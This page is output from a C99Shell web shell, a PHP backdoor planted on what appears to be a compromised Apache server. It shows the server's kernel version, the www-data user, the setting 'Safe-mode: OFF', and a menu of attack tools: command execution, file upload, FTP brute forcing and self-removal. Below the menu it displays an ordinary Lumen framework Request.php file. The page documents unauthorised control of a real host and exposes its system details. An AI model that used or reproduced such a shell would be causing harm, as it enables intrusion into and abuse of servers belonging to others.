!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/notification/vendor/laravel/lumen-framework/src/Http/   drwxr-xr-x
Free 12.93 GB of 57.97 GB (22.31%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Request.php (1.78 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Laravel\Lumen\Http;

use 
Illuminate\Http\Request as BaseRequest;
use 
Illuminate\Support\Arr;
use 
Illuminate\Support\Str;
use 
RuntimeException;

class 
Request extends BaseRequest
{
    
/**
     * Determine if the route name matches a given pattern.
     *
     * @param  mixed  $patterns
     * @return bool
     */
    
public function routeIs(...$patterns)
    {
        if (! 
Arr::exists($route $this->route()[1], 'as')) {
            return 
false;
        }

        foreach (
$patterns as $pattern) {
            if (
Str::is($pattern$route['as'])) {
                return 
true;
            }
        }

        return 
false;
    }

    
/**
     * Get the route handling the request.
     *
     * @param  string|null  $param
     * @param  mixed  $default
     * @return array|string
     */
    
public function route($param null$default null)
    {
        
$route = ($this->getRouteResolver())();

        if (
is_null($route) || is_null($param)) {
            return 
$route;
        }

        return 
Arr::get($route[2], $param$default);
    }

    
/**
     * Get a unique fingerprint for the request / route / IP address.
     *
     * @return string
     *
     * @throws \RuntimeException
     */
    
public function fingerprint()
    {
        if (! 
$this->route()) {
            throw new 
RuntimeException('Unable to generate fingerprint. Route unavailable.');
        }

        return 
sha1(implode('|', [
            
$this->getMethod(), $this->root(), $this->path(), $this->ip(),
        ]));
    }

    
/**
     * Determine if the given offset exists.
     *
     * @param  string  $offset
     * @return bool
     */
    
public function offsetExists($offset): bool
    
{
        return 
Arr::has(
            
$this->all() + $this->route()[2],
            
$offset
        
);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]--